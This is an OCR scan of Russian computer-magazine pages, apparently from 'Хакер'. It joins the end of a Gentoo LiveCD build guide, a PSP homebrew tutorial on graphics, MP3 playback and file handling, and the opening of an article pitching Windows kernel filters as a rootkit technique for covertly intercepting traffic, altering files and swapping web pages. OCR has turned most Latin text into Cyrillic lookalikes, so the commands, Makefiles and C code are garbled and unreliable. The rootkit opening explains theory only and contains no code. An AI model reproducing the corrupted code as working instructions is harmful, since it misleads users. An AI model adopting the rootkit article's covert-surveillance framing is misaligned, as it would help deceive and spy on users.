(ЬІѴЕСБ) # есію 1 х11-шізс/ткхі8бсопіід ' » /еЬс/рогЬаде/ 
раскаде . иптазк 

(ЬІѴЕСБ) # еско ' зуз-аррз/ЬмзеЬир ' » /еЬс/рогЬаде/ 
раскаде . иптазк 

(ЬІѴЕСБ) # етегде -аѵ Ііѵессі-Ьооіз 

Не спеши отвечать ' уез ' . Лучше внимательно посмотри на список 
предлагаемых пакетов: библиотека ІіЬкисіги должна предлагаться 
версии не ниже, чем 1.2. 57.1. Если будет уста на вливаться более старая 
версия, отвечаем 'по' и разрешаем ІіЬкисЗги из тестовой ветки. Вот 
так: 

(ЬІѴЕСБ) # есію 1 зуз-1іЬз/1іЬкисІ2и ~х86 1 » /еЬс/ 
рогЬаде/раскаде . кеучлгогсіз 

После повторной команды «етегде -аѵ Ііѵессі-Ьооіз» должна быть 
предложена более новая версия. 

Затем добавляем пакет в автозагрузку: 

(ЬІѴЕСБ) # гс-ирсіаЬе асісі аикосопіід сІеіаиІЬ 



Создаем пользователя, с правами которого будем работать: 

(ЬІѴЕСБ) # изегасМ -т -С изегз , ѵіЬееІ , аисііо , \ 
ѵісіео , ссігот, ссіплг, изЬ \ 

-з /Ъіп/ЪазЪ. Ііѵессі 

Устанавливаем пароль: 

(ЬІѴЕСБ) # раззчлкі ііѵессі 

В НАСТРАИВАЕМ АВТОМАТИЧЕСКИЙ ВХОД В СИСТЕМУ 

1. Устанавливаем тіпдеЛу: 

(ЬІѴЕСБ) # етегде -аѵ тіпдеЫсу 

2. Прописываем его в/еІс/іпіЛаЬ вместо адеЛу. Строку: 

сі : 12345 : гезраѵт: /зЬіп/адеЬЬу 38400 ЬЬуІ Ііпих 
нужно исправить на: 

сі : 12345 : гезраѵт: / зЬіп/тіпдеЬЬу 
--аиЬоІодіп Ііѵессі 
--посіеаг ЬЬуІ 

3. Правим файл /зЬіп/гс. Находим секцию «БрсІаЬіпд іпіЬЬаЬ» (при- 
близительно строка 500) и делаем ее такой: 

іі [ -I " /зЬіп/Ііѵессі-ІипсЬіопз . зЛ" -а -п " $ {СБВООТ} " ] 
Ытеп 

еЬедіп "БрсІаЬіпд іпіЫсаЬ" 

/Ьіп/Ьгие #1іѵессі_Ііх_іпіЬЬаЬ 
еепсі $? 

/Ьіп/Ьгие #/зЬіп/Ье1іпіЬ д &>/сІеѵ/пи11 
іі 

В СОЗДАНИЕ ІБО ОБРАЗА 

Выходим из сНгооЛокружения и запускаем скрипт ЬиіІсІ.зЬ: 

(ЬІѴЕСБ) # ехіЬ 
# . /Ъиіісі. зЪ. 

Процесс сборки -образа длится примерно минут пять. После чего заби- 
раем 150 файл в директории Ііѵессі . Объем ~ 1 54 Мб. Можно записать его 
на болванку, но лучше для этих целей поставить ѴігІиаІВох или ѴМѴѴаге, 
потому как — удобнее и быстрее. Записать на Сй можнотак: 
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# ссігесогсі -ѵ -е^есЬ зреес!=10 Ьз = 8т 
Ьеѵ=/с1еѵ/сс1гѵ7 ітаде.ізо 

Или, если это ОѴО.то так: 

# дгомізоіз -сіѵсІ-сотраЬ -2 /Ьеѵ/сіѵсІ=ітаде . ізо 

Образ должен загрузиться. Когда дойдет до приглашения, будет произве- 
ден автоматический вход под пользователем ІіѵессІ. Поздравляю, полдела 
сделано. Сейчасжелательно создатьархив с каталогом ІіѵессІ на случай, 
если при дальнейших манипуляциях что-нибудь пойдет не та к (можно 
будет откатиться). 

Н УСТАНОВКА КРЕ 

Устанавливаем Хогд и драйвер пѴібіа: 

(ЬІѴЕСБ) # етегде -аѵ хогд-хзегѵег 
(ЬІѴЕСБ) # етегде -аѵ пѵісііа-сігіѵегз 

Правим таблицу соответствия устройство-драйвер для пѴібіа-карт. Откры- 
ваем файл /изг/зЬаге/Ьж1аЬа/Сагс1з, находим строку БАМЕ ЫѴІБІА 
Ьедасу и меняем название драйвера 'ѵеза' на ' пѵ' .Далее находим стро- 
ку ЫАМЕ ЫѴЮІАОеРогсе и меняем название драйвера с ‘ѵеза’ на 'пѵіЬіа' . 
Теперь добавляем строки для работы с видеоадаптером ѴігіиаІВох (приго- 
дится, если ты будешь проводить отладку с помощью этой программы). 

(ЬІѴЕСБ) # есЬо 'БАМЕ ѴігЬиаІВох’ » 
/изг/зЬаге/ЬмЬаЬа/СагЬз 

(ЬІѴЕСБ) # есЬо ' БКІѴЕК ѵеза' » /изг/зЬаге/Ьмс1аЬа/Сагс1з 

Устанавливаем минимальный набор КОЕ: 

(ЬІѴЕСБ) # етегде -аѵ кЬт кЬеЪазе-зЬагЬкЬе кс!е-і18п 
Установка всех пакетов из этого набора заняла у меня 4 часа 30 минут. 

► 090 



Добавляем в автозапускхЬт и указываем в нем запускаемый оконный 
менеджер. В файле /еЬс/сопЬ . Ь/хсЗт переменной біЗРЬАУМАБАСЕК. 
присваиваем значение «кбт»: 

(ЬІѴЕСБ) # гс-ирсІаЬе асЫ хЬт ЬеЬаиІЬ 

Настройка автомонтирования съемныхустройств: 

(ЬІѴЕСБ) # етегде -аиѵ ЬЪиз Ъ.а1 ртоипЬ 
(ЬІѴЕСБ) # гс-ирЬаЬе асісі ЬЪиз ЬеЬаиІЬ 
(ЬІѴЕСБ) # гс-ирсІаЬе асісЗ. ЬаІЬ ЬеЬаиІЬ 

В файл /еЬс/сопЬ . Ь/Іосаі . зЬагЬ добавляем команду для автомати- 
ческого создания каталога тесіі а. В нем будут создаваться точки монтиро- 
вания для всех съемныхустройств. 

(ЬІѴЕСБ) # есЬо 'ткЬіг / тесіі а ' » /еЬс/сопЬ . Ь/Іосаі . 
зЬагЬ 

Включаем русскую раскладку и переключатель еп/ги. Для этого: 

1. Открываем файл /изг/зЪіп/ткхЬ86сопЬід. зЬ и удаляем строку 
вида: 

" -е ' з I "ХкЬЬауоиЬ " * " [ л " ] * " I "ХкЬЬауоиЬ " [ . . . ] 

2. Открываем файл /еЬс/Х11/хогд . сопЬ . іп и в секции іприЬБеѵісе, 
КеуЪоагЬО меняем последниетри строчки на следующие: 

ОрЬіоп "ХкЬЬауоиЬ" "из , ги (міпкеуз ) " 

ОрЬіоп "ХкЬѴагіапЬ " "из" 

ОрЬіоп "ХкЬОрЬіопз" "дгр : аІЬ_зМЬЬ_Ьодд1е,дгр_1еЬ: зсгоіі " 

Если у тебя есть набор ТгиеТуре- шрифтов, таких, какАгіаІ, Та бота, Соигіег 
Ыеѵѵ, то их нужно положить в какой-нибудь каталог, например ььіопЬз, и 
скопировать его в /изг/зЬаге/ЬопЬз. Затем: 
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(ЫѴЕСБ) # ссі /изг/зкаге/іопкз/СЫопСз 
(ЫѴЕСБ) # склюй 644 * 

(ЫѴЕСБ) # шкіопксііг 
(ЫѴЕСБ) # ткіопкзсаіе 
(ЫѴЕСБ) # іс-саске -Тѵ 

Открываем файл /еСс/Х11/хогд . сопі . іп и добавляем в секцию Еііез 
следующую строку: 

ЕопБРаСк " /изг/зкаге/ ТопСз/ЫіопБз/ " 

Если такого набора шрифтов утебя нет, можно поставить пакетсогеіопБз, 
который включает в себя около семи шрифтов (но в нем нетТаИогша и 
Ьисісіа Сопзоіе). Делается это так: 

(ЫѴЕСБ) # ешегде -аѵ теЫа-Топкз/согеТопкз 

Н НАСТРОЙКА АВТОМАТИЧЕСКОГО ВХОДА 
ДЛЯ КОМ И ТОНКАЯ НАСТРОЙКА КОЕ 

В этом разделе нам нужно будет еще раз создать ізо-образ и один раз 
с него загрузиться. Какуже было написано выше, это можно сделать 
при помощи ѴМѴѴаге или ѴігіиаІВох. Общий план работ с новым ЫѵеСО 
таков: 

1. Входим в БіѵеСБ под логином Ііѵессі 

2 . Производим тонкую настройку КБЕ , исходя 
из своих предпочтений (сюда входит все: 
начиная от шрифтов и обоев рабочего стола 

и заканчивая поведением окна и видом мышиного 
курсора) 

3. Архивируем директорию /коте/ Ііѵессі и записываем архив 
на какой-нибудь носитель 

4 . Выключаем ЬіѵеСБ 

5 . Копируем архив с сохраненными настройками в каталог 
зоигсе/коше 

6. Выполняем скгооб в зоигсе через скрипт епбег 

7 . Распаковываем архив с настройками в каталог /коше/ 
Ііѵессі, а сам архив удаляем 



Получается, при входе под учетной записью Ііѵессі пользователя будет 
ждать красиво оформленный и настроенный рабочий стол. Осталось 
только сделатьтак, чтобы вход был автоматический. Для этого открываем 
файл /изг/кбе/3 . 5/зкаге/сопбід/кбш/кбшгс и раскомментируем 
следующие строки: 

БоРаззЕпаЫе=бгие 
АибоБодіпЕпаЫе=Сгие 
АибоБодіпІІзег^ ое 

Обрати внимание на строку АибоБодіпБзег. Так каклогин нашего пользо- 
вателя отличается от предложенного, меняем значениере на Ііѵессі . 

В УСТАНОВКА ДОПОЛНИТЕЛЬНЫХ ПРИЛОЖЕНИЙ 

Теперьу нас есть готовый, но еще «голый» ЫѵеСО-диск (без программ 
пользователя). Желательно сделать архивную копию (всего каталога, где 
велась разработка). Если в дальнейшем что-нибудь пойдетнетак, можно 
будет его распаковать и начать работу с этого момента. 

Сейчассамое время начать устанавливать и настраиватьсвои приложе- 
ния. Самыми популярными, полагаю, будут Копзоіе, МібпідЫСоттапсІег и 
Ѵіт. Чтобы установить их, набираем: 

(ЫѴЕСБ) # ешегде -аѵ тс ѵіт 
(ЫѴЕСБ) # ешегде -аѵ копзоіе 

Все остальные приложения устанавливаются по аналогии. 

Н ВСЕ ПУНКТЫ ПРОЙДЕНЫ 

Вот, в принципе, и все. Собраны основные пакеты, затрачено громадное 
количество процессорного времени. Теперь у тебя есть собственный 
полностью работоспособный ЕіѵеСО. Настраивать и улучшать можно до 
бесконечности, главное, знать чувство меры. Заточи ЫѵеСО для какой-то 
конкретной цели. Дай название своемудистрибутиву и расскажи о нем 
друзьям. Может, уже через пару месяцев твой диск будет в десятке лучших 
на сІізІтоѵѵаІюЬ.сот . Если какой-то определенной задачи нет, попробуй сде- 
лать копию своей рабочей машины и бери его с собой. Теперь, где быты ни 
находился, утебя всегда будет под рукой удобная и максимально настроен- 
ная система. Повеем вопросам пиши на рігдіп@дтаі1 . сот. Удачи! ПЕ 
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Вероятно, ты читал первую часть статьи. Там речь шла о том, как выводить] 
текст на экран, а также о простейшей экранно й клавиатуре и какой-ника-| 
кой отладке. Теперь, когда с <іеЪи§ тосіе (так называется текстовый режим) 
более-менее покончено, пришло время разобрать основной арсенал двух- 
мерного кодера. 



В КАК ПРОЙТИ В БИБЛИОТЕКУ? 

Среди всего скачанного на твой компьютер месяц назад не было библиотек, 
которые мы собираемся использовать сегодня, а именно — гІіЪ и ІіЬрпд. 
Поэтому самое время запустить Судѵѵіп БЬеІІ и начать получать их из репо- 
зитария. Устанавливаются библиотеки так: 

зѵп сЬескоиС зѵп: //зѵп.рзрсіеѵ. огд/рзр/Сгипк/ 2 ІіЬ 

ссі 2 1 ІЬ 

таке 

таке іпзСаІІ 
ссі . . 

гт -КС 2 1 ІЬ 

зѵп сЬескоиС зѵп: //зѵп.рзрсіеѵ. огд/рзр/Сгипк/ ІіЬрпд 

ссі ІіЬрпд 

таке 

таке ІпзСаІІ 
гт -КС ІіЬрпд 

В результате последовательного запуска этих команд на компьютер будут 
скачаны исходные коды библиотек (зѵп сЬескоиі), после чего выполнит- 



ся сборка [таке] и установка [таке іпзіаіі). В конце, в целях экономии 
места и чтобы не смущать программиста, директории с исходниками будут 
удалены (гт -Кк). 

Теперь можно переходить к использованию скачанного кода. Открываем 
наш старыйтаіп. срр (или какты его назвал?) и, истории ради сохранив 
его под другим именем, начинаем модифицировать. Первое, что мы напи- 
шем — мозаику из кучи логотипов «Пакера» (логотип 16 на 16 в формате РЫѲ 
ты найдешь на диске). Конечно, никто не мешаеттебе взять любую другую 
картинку, преобразовав ее в РЫО и поменяв название. 

Переименуем нашу программу, изменив первый параметр макроса, кото- 
рый задает информацию о модуле: 

Р8Р_МОШЬЕ_ШРО( "Хакер Іюдоз" , 0, 1, 1) ; 

Теперь изменим секцию инклудов, добавим в нее новые библиотечные 
файлы: 

#іпс1исіе <рзрс!ізр1ау . Ь> 

#іпс1исіе <рзрсСг1.Ь> 

Сіпсіисіе <рзркегпе! . Ъ> 
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Вот что бывает, если забыватьочищатьэкран 



#іпс1ийе <рзрйеЪид . Ь> 

#іпс1ийе <рзрди.1і> 

Ііпсіийе <рпд.1т> 

#іпс1ийе <з1йіо.1і> 

Ііпсіийе "дгарМсз .Ь." 

Как видишь, появились некоторые новые заголовочные файлы, например, 
дгарЫсз .Ь (описывает некоторые полезные в работе с картинками 
функции). Возьми его на диске вместе с дгаркісз. с, ІгатеЬиІІег. с и 
ІгатеЬиІІег .Ь и положи в папку с основным файлом. В них содержится 
код, который в противном случае пришлось бы писать самому. 

Ну что ж, определим простой макрос: 

#йеіі л е ргіпіі рзрВеЪидЗсгеепРгіпІІ 

Он всего лишь позволяетобращаться кфункции рврОеЬидЗсгеепРппН 

— какбудто это функция рппй. Какты помнишь, их формат и назначение аб- 
солютно совпадают, так что макрос повысит читабельность кода и упростит 
программирование. 

«Странные» функции ЕхіѣСаІІЪаск ( ) , Саі ІЪаскТЪгеад ( ) и 
ЗеѣирСаІІЪаскз () остаются без изменений, потому что никаких новых 
каллбэков нам не потребуется, а выход из программы все равно должен 
происходить. Всю функциюлъэіл ( ) придется заменить на новый код, 
который ты можешь рассмотреть на соответствующей врезке или глянуть на 
диске (сначала смотрим код и пишем, потом — разбираем). 

Ну и наконец, совершим новы ілМакеІИе, учитывающий тот фа кт, что у нас 
теперь четыре файла вместо двух и новые библиотеки: 

ТАКСЕТ = Ъеііо 

ОВйЗ = гпаіп.о дгарЫсз. о ІгатеЪиііег . о 
СРЬАСЗ = -02 -СО -Ѵ7а11 

СХХРЬАСЗ = $ (СРЬАСЗ) -іпо-ехсерііопз -бпо-гЬЬі 
АЗРЬАСЗ = $ (СРЬАСЗ) 

ЫВЫЕ = 

ЫВЗ = -Ірзрди -Ірпд -І 2 -1т 
ЬБРЬАСЗ = 

ЕХТКА_ТАКСЕТЗ = ЕВООТ . РВР 
РЗР_ЕВООТ_ТІТЬЕ = Ітаде Ехатріе 
РЗРЗВК=$ ( зЪеІІ рзр-сопіід --рзрзйк-раік) 
іпсіисіе $ (РЗРЗВК) /ІіЪ/ЪиіІй.так 

В РАБОТА С ГРАФИКОЙ 

Разберем представленный листинг (когда соберешь его командой таке и 
станешьзакидыватьна приставку, не забудь скопировать туда же картинку 
хакер. рпд с диска!). Код почти всех новых функций содержится в дгаркісз. 
срр и его можно посмотреть в любой момент, поэтому я ограничусь простым 
описанием. Структура Ітадехранитчетырезначения помимо самой картинки: 
ее размеры (Ітаде: : ітадеНеідкі: — высота и Ітаде: : ітадеШісІѣЪ 

— ширина) и двазначения, описывающие размеры двухмерного массива цве- 
тов Соіог* сіаѣа, в котором хранится картинка как набор разноцветныхточек. 



Функция ЫіѣАІркаІтадеТоЗсгееп () отображает картинку или ее часть 
на экране (в виде прямоугольника). Первые два аргумента — координаты 
выводимого прямоугольника на хранящейся в памяти картинке, еще два 
параметра — его размеры (если выводим всю картинку, то параметры долж- 
ны быть О, О, оигІтаде-ЫтадеШійЪЪ, оигІтаде-^ітадеНеідкі). 
Потом идет ссылка на структуру с картинкой (типа Ітаде) и координаты 
на экране выводимого прямоугольника (мы задаем их как произведение 
ширины или высоты на номертекущего столбца или строки, которые пе- 
речисляются в цикле). Ну, а ІІірЗсгееп ( ) меняет экран на содержимое 
видеопамяти, в которую мы запихивали картинки. 

Помимо ЫіІАІркаітадеТоЗсгееп ( ) в дгаркісз . срр естьеще не- 
сколько похожих функций. Например, ЫіѣІтадеТоЗсгееп () действует 
также, но учитывает альфа-канал (еще 8 бит в структуре Соіог, отвечаю- 
щие за прозрачностьточки). «Сестры» ЫіѣАІркаІтадеТоІтаде ( ) и 
ЫіІітадеТоітаде ( ) отличаются тем, что копируют картинку или ее 
кусок не на экран, а в другую структуру типа ітаде, ссылка на которую 
передается им последним аргументом. Вместо вызова Іоасіітаде ( ) для 
получения картинки из файла можно воспользоваться сгеаѣеітаде ( ) 

(два параметра: ширина и высота будущей картинки) — она возвращает 
указатель на пустую черную картинку заданных размеров. После манипуля- 
ций с картинкой ее можно очистить и залить цветом: сіеагітаде ( ) (опять 
два параметра: цвет и указатель на картинку). Цвет тут задается структурой 
типа Соіог, создать которую можно при помощи макроса П6В: 

Соіог гесі = КСВ(2 55, 0, 0) ; 

Точнотакже можно очистить и весьэкран: сІеагЗсгееп (КСВ (0 , 255, 

0) ) . Отдельный прямоугольникна картинке или экране можнозалить при 
помощи функций ІіІІітадеКесІ или ІіІІЗсгеепКесі:, передав цвет, 
координаты и размеры прямоугольника, а для ІИИтадеКесѣ — еще и ука- 
затель на картинку, последним аргументом. Отдельный пиксель на экране 
или картинке задается функциями риѣРіхеІЗсгееп или риѣРіхеІІтаде- 
их параметры: цвет, координата поХ (по горизонтали, от нуля до 272, если на 
экране) и поУ (по вертикали, на экране может быть от нуля до 480); нуа полу- 
чить его цвет можно через деІРіхе13сгеепѵ\ деІРіхеІітаде (параметры 

— координаты Хили У, ну и указатель, если функция работаете картинкой). 

На картинке можно написать и текст -.ргіпѣТехѣ Ітаде; координаты текста 

— это два первых параметра, потом идетуказатель на строку, цвет и указатель 
на картинку. Еще пара функций: сІгажЬіпеЗсгееп и (ІгаѵіЬіпеітаде рису- 
ютлинии, если передать им координаты точек начала и конца и цвет: 

зсеВізрІауШіРѴЫапкЗкагк ( ) ; 

сІгаѵтЦіпеЗсгееп (10 , 10, 70, 70, КСВ (255, 0, 0)); 
сігаѵ^РіпеЗсгееп (10 , 70, 70, 10, КСВ ( 0 , 2 55, 0)); 
ІІірЗсгееп ( ) ; 

Если написать это вместо всего, что касается картинки в таіп(),то можно 
увидеть зеленую и красную линию крест-накрест, какна скрине. 

Щ ПРОСТЫЕ ДВИЖЕНИЯ 

Попробуем теперь заставить этот крест ездить поэкрану. Еслиты внима- 
тельно читал первую статью (хотя бы часть про кнопки), утебя не будете 
этим проблем: 

ЗсеСкгІБака рай; 
іпС х=0 , у=0 ; 
ѵкіііе(і) { 

зсеВізрІауѴ/аіРѴЫапкЗІіагк ( ) ; 
зсеСкгІКеайВиІІегРозікіѵе (край, 1) ; 

11 (рай. Виккопз & РЗР_СТКЬ_ІІР) у -= 10; 

11 (рай.ВиІІопз & РЗР_СТКЬ_ВОШ) у += 10; 

11 (рай.ВиІІопз & РЗР_СТКЬ_РЕРТ) х -= 10; 

І1 (рай. Виііопз & РЗР_СТКЬ_КІСНТ) х += 10; 
йгаѵ^ЬіпеЗсгееп (х + 10, у + 10, х + 70, у + 70, 

КСВ (255, 0, 0) ) ; 

йгамЫпеЗсгееп (х + 10, у + 70, х + 70, у + 10, 
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ЕСВ ( 0 , 255, 0) ) ; 

ПірЗсгееп ( ) ; 
сІеагЗсгееп (ЕСВ ( 0 , 0, 0)); 



Основная 

функция 

программы 

іпк шаіп ( ) { 

скаг ЪиТТег [200] ; 

// буфер, в нем хранится картинка как набор байтов 
Ітаде* оигітаде; 

// указатель на структуру, в которой хранится 
картинка и информация о ее размерах 
рзрБеЪидЗсгеепІпік ( ) ; 

ЗебирСаІІЬаскз ( ) ; 
іпікСгаркісз ( ) ; 

/ / инициализирует «графический» режим 
зргіпВ5 (ЬиТГег , "хакер . рпд" ) ; 

/ / считываем картинку из файла в буфер 
оигітаде = Іоабітаде (ЪиТТег ) ; 

/ / преобразуем буфер в структуру типа Ітаде 
іі ('оигітаде) { 

ргіпкі ( " Раіі ! \п" ) ; //не получилось 
} еізе { 

іпС тах_х = 480/оигІтаде->ітадеНеідЬб ; 

// максимальное количество картинок в столбце 
(количество строк) 

іпС тах_у = 272 /оигітаде ->ітадеѴ/ібкЪ.; 

// максимальное количество картинок в строке 
(количество столбцов) 

зсеБізрІауМаікѴЫапкЗбагк ( ) ; 
бог (іпб х = 0; х < тах_х; х++) //по строкам 
бог (іпб у = 0; у < тах_у; у++) //по столбцам 
ЫібАІрЬаІтадеТоЗсгееп ( 0 , 0, 
оиг Ітаде ->ітадеШіббк, 
оигітаде - >ітадеНеідкб , оигітаде, 
х*оигІтаде->ітадеНеідкб , 
у* оигітаде- >ітадеМіс!ббО ; 
бІірЗсгееп ( ) ; 

} 

зсеКегпеІЗІеерТкгеаб ( ) ; 
гебигп 0; 



Все просто: когда ты нажимаешь на кнопки-стрелки, числа Хи У, которые 
прибавляются к координатам точек, увеличиваются или уменьшаются с 
шагом 1 0. После чего выводится крестик. 

г ГОНИ ВОЛНУ! 

Взавершение разговоров о двухмерной графикея расскажу, какразогнать 
Р5Р — ведь при работе с картинками скорость «решает»! Тактовая частота 
процессора приставки по умолчанию равна 222 МГц, но ее абсолютно 
безопасно можно разогнатьдо предусмотренной создателями частоты в 
333 МГц, точно та к же, каки частоту графического чипа до 166 МГц. Почему 
такие частоты не стоят по умолчанию? В 5опу решили, что 222-ух мегагерц 
вполне хватит для всего, что в ближайшем будущем придет в голову 
разработчикам, и в целяхувеличения времени работы от батарейки без 
подзарядки не стали повышать до 333. Сейчас они, видно, уже раскаялись, 
поскольку в Оосі о^ѴѴаг: СЬаіпз о^ОІутриз частота на время игры офици- 
ально повышается. Если ты уже перестал сомневаться, то смело добавляй 
в начало кода такие строки: 

зсеРотлгегЗебСІоскРгедиепсу ( 333 , 333 , 166); 

Первый параметр устанавливает частоту основного процессора, второй 
— Мебіа Епдіпе, атретий — графического чипа (ставьот 1 до 166 МГц). Еще 
раз повторюсь: если ставить разрешенные частоты, то ничего плохого не 
случится — только хорошее. 

Щ ЗВУКОВЫЕ БИБЛИОТЕКИ 

При помощи вышеописанноготвоя программа может оказаться на графи- 
ческомуровне игры «Марио» (еслиты напишешь нормальный 30-движок, 
пользуясь только этими функциями — это уже будет фантастикой). Не 
хватаеттолько звука! Ксчастью, помогли замечательные разработчики 
с рз2беѵ.огд (так называется один из центральных сайтов, посвященных 
разработке под все сониевские игровые консоли). На этом сайте можно 
найти немало библиотек и отличный форум с кучей советов. Крометого, 
там портировали ІіЬтасІ (МРЕ6 аибіо бесобег), которая умеет играть любые 
запакованные в МРЕ6 файлы, втом числе, ппрЗ. Итак, скачаем исходные 
коды сзѵп и установим: 

зѵп сЬескоиб зѵп: //зѵп.рз2беѵ. огд/рзр/бгипк/ІіЬтаб 

сб ІіЬтаб 

таке 

Если сейчас попробовать набрать таке іпвѣаіі, шелл выдаст странное 
сообщение «не в тему». Это значит, что установку наши предшественники 
еще недоделали, и придется устанавливать библиотеку самому: 

ср -Е1 ./іпсіибе /изг/іосаі/рзрбеѵ/рзр/ 

ср -ЕІ . /1іЬ/1іЬтаб. а /изг/ІосаІ/рзрбеѵ/рзр/ІіЪ 

Так мы копируем заголовочные файлы и библиотеку ІіЬтасІ. а в папку с 
рврбеѵ. Теперь можно удалить скачанные исходники: 

сб .. 

гт -ЕІ . /ІіЬтаб/ 

Отлично! Пора начинать изменять сами файлы с кодом (разумеется, пред- 
варительно надо сделать бэкап). Оставьтолько несколько заголовочных 
файлов — иххватитза глаза: 

#іпс1ибе <рзркегпе1 .Ъ> 

#іпс1ибе <рзрскг1 .Ъ> 

#іпс1ибе <рзрбеЬид . к> 

#іпс1ибе <рзрбізр1ау . к> 

#іпс1ибе <рзраибіо .Ъ> 

#іпс1ибе <рзраибіо1іЬ.1т> 

#іпс1ибе <рзрромег .Ъ> 

Тіпсіибе "трЗрІауег . к" 
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Да, трЗІауег.Ь — еще один файл, который тебе придется 
поискать на диске (вместе стрЗрІауег. с). Он был взят из 
РЗРМесііаСепІег. После изменения инклудов переименуй 
программу (первый аргумент в вызове макроса РЗР_МООиЬЕ_ 
ШРО ) на «МрЗ Ріауег» и прокрути файл до функцииілаіл ( ) 
(волшебные функции с каллбэками, какобычно, остаются 
неизменны). Новый код (между вызовами Зе ѣирСа ІІЪаскз ( ) 
и зсеКегпеІЗІеерТЬгеасі ( ) ) прост, как никогда: 

МРЗ_ІПІД (1) ; 

МРЗ_Ьоасі ( " Резо . шрЗ " ) ; 

МРЗ_Р1ау ( ) ; 

тлгЬіІе (МРЗ_ЕгкЗОбЗЦгеаш ( ) != 1) 
зсеБізрІауШіЦѴЫапкЗЦагІс ( ) ; 

МРЗ_ЗДор ( ) ; 

МРЗ_РгееТипе ( ) ; 

Тутмы инициализируем трЗ-проигрыватель и играем Сезі . 
гпрЗ. Разумеется, музон сам собой не появится! Тебе придется 
переименовать свой любимый трек в «ѣезѣ .тпрЗ» и положить 
его в папкус прогой (учти, еслитвоя программа заработает не 
так, как надо, то есть вероятность, что ее будет невозможно 
за вершить до конца трека). Когда аудиопоток заканчивается, 
проигрывание останавливается и память освобождается при 
по мо щи МРЗ_ІРгееТшзе () . Ну и еще измен итсяМэкеГіІе, в 
него мы добавим парочку библиотек: 

ТАКСЕ Т = шрЗ 

ОВЦЗ = шрЗрІауег.о шаіп.о 
СЕЬАСЗ = -02 -СО -Маіі 

СХХЕЬАСЗ = $ (СЕЬАСЗ) - Іпо-ехсеркіопз -Тпо-гЬЬі 
АЗЕЬАСЗ = $ (СЕЬАСЗ) 

ЫВЫК = 

ЫВЗ = -Ітасі -ІрзраисЗіоІіЬ -ІрзраисЗіо - 

Ірзррслѵег 

ЬБЕЬАСЗ = 

ЕХТКА_ТАКСЕТЗ = ЕВООТ . РВР 
РЗР_ЕВООТ_ТІТЬЕ = МРЗ Ріауег Ехатріе 
РЗРЗЬК=$ ( зЬеІІ рзр-сопбід --рзрзсЗк-раЫг) 
іпсіисіе $ (РЗРЗБК) /1іЬ/Ьиі1(1.так 

Собираем, заливаем, открываем и наслаждаемся. Если ка- 
жется, что звука нет... — может, ты забыл поставить громкость 



повыше? На экране библиотека (сама!) показываетинформа- 
цию о файле: например, битрейт или формат. Послетого, как 
мы взбодрились музыкой, можно придумать еще чего-нибудь, 
скажем, выводить время, которое уже прошло от начала трека. 
В этом поможет функция МРЗ_СеіТітеЗігіпд ( ) с аргумен- 
том-указателем на буфер, в которую будет записано время в 
формате «часы:минуты:секунды». Еще можно останавливать 
воспроизведение по нажатию крестика — используется 
фу нкци я МРЗ_Зѣор ( ) . Отлично, этого хватит, чтобы легко 
подключать саундтрек ктвоим играм, да и для простейшего 
проигрывателя достаточно. Теперь можно научиться работать 
с файлами — например, плейлистами или настройками. 

Н РАБОТА С ФАЙЛАМИ 

Работа с файлами — ничуть не менее важноеумение для про- 
граммы, чем вывод на экран и получение состояния кнопок. 

В начале статьи мы касались работы с изображениями, а 
сейчас я покажу, какоткрывать файл, считывать его в память и 
закрывать. Программа будет считывать содержимое файла и 
выводитьего на экран. Иззаголовочных файлов потребуются 
только рзркегпеІ.Ъ, рзрсІеЪид.Ь, зѣсІіо.Ь и зѣсІІіЪ.Ъ ; 
МакеРИеты можешь взять из первой части статьи. 
Последние два заголовочных файла абсолютно стандартны 
для языка С, и работать с ними ты наверняка умеешь. Файл 
открывается функцией кореп, первый параметр кото- 
рой — имя файла, второй —тип доступа (например, «гЬ» 

— чтение бинарного файла, а «и/» — запись в обычный). При 
помощи кзеек (рРИе, О, ЗЕЕК_ЕШ) указатель можно 
прокрутитьдо конца; это нужно, чтобы быстро определить 
его размер через кѣеіі (рЕіІе) . Перематываем назад: 
геъгіпсі (рЕіІе) и, наконец, считываем его содержимое в 
буфер: РгеасЗ (Ьиккег , 1 , ІЗіге, рЕіІе) . Каждый раз надо 
проверятьуказатели иаШЬЬ: на файл и на буфер. В случае 
неудачи можно вывести сообщение об ошибке или просто 
прекратить выполнение программы (разумеется, в серьезном 
продукте надо выводить сообщение) при помощи простейшей 
зсеКегпеІЕхі ѢСате () — нечто вроде ехі ѣ () . 

Итак, мы разобрали картинки, музыку и файлы. Этого вполне 
хватит для написания чего угодно: отчиталки книгдо плеера, 
от морского боя до какой-нибудь большой и сложной игры, с 
сохранением настроек и «рекордов». Возможно, в будущем 
мы еще поговорим о работе с сетью и трехмерной графике. 
Успехов! ЗС 




> Ипкз 

Интересную инфор- 
мацию и полезные фо- 
румы (на английском 
языке) можно найти на 
сайтах Ьир://рв2сІеѵ. 
огд/рвр/ и ЬирУ/ѵѵѵѵѵѵ. 
рвр-ргодгаттіпд. 




> СІѴСІ 

На компакт-диске 
лежат исходные коды 
программ, написан- 
ных мной для этой 
статьи. 




> ІП^О 

Для Р5Р доступ- 
но немало других 
ОрепЭоигсе библио- 
тек. Попробуй исполь- 
зовать, если хочешь. 
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С ФИЛЬТРОМ, 
ПОЖАЛУЙСТА! 



ЗВУКА РУТКИТ- КОДЕРА; ФИЛЬТРЫ В ЯДРЕ ѴШРбЩ 



(Скажи мне, часто ли бессонными ночами ты мечтал накодить программу, 


у 


которая бы без ведома пользователя тихонечко отс 


]шльтровывала сетевой 


крас 


|эик? Или обращения к файловой системе? И пр 


>и этом модифицировал; 


|бы д 


)айлы налету? Или подменяла веб-страницы?! 





егодня мы поговорим об основополагающей руткит-технике 
— фильтрах в режиме ядра ѴѴІпсІоѵѵз. Тема эта оченьзахва- 
тывающая и при прямых руках может принести неслыханные 
дивиденды. Тебе покорятся и невидимая модификация фай- 
лов на диске, и подмена содержимого веб-страниц и редирект сетевого 
трафика, в общем — полный список! 

Н НЕМНОГО ТЕОРИИ, ИЛИ «УСТРОЙСТВО» В ѴШ00ѴѴ5 

Что такое объект «устройство»? В ОС ѴѴІпсІоѵѵз диспетчер ввода-вывода 
о п ред ел я ет «у стр о й ств о » ( \ Оеѵі се \ <йе ѵі се_пате> } дл я п ред ста в л е н и я 
того физического, логического или виртуального устройства, чей драйвер 
был загружен в систему. Согласно существующим правилам, каждый драйвер 
должен создавать объект «устройство» для того физического (виртуального) 
устройства, которым он управляет. Форматобъекта «устройство» определяется 
структурой ОЕѴІСЕ_ОВ7ЕСТ $ описание которой ты без труда найдешь в 00К. 
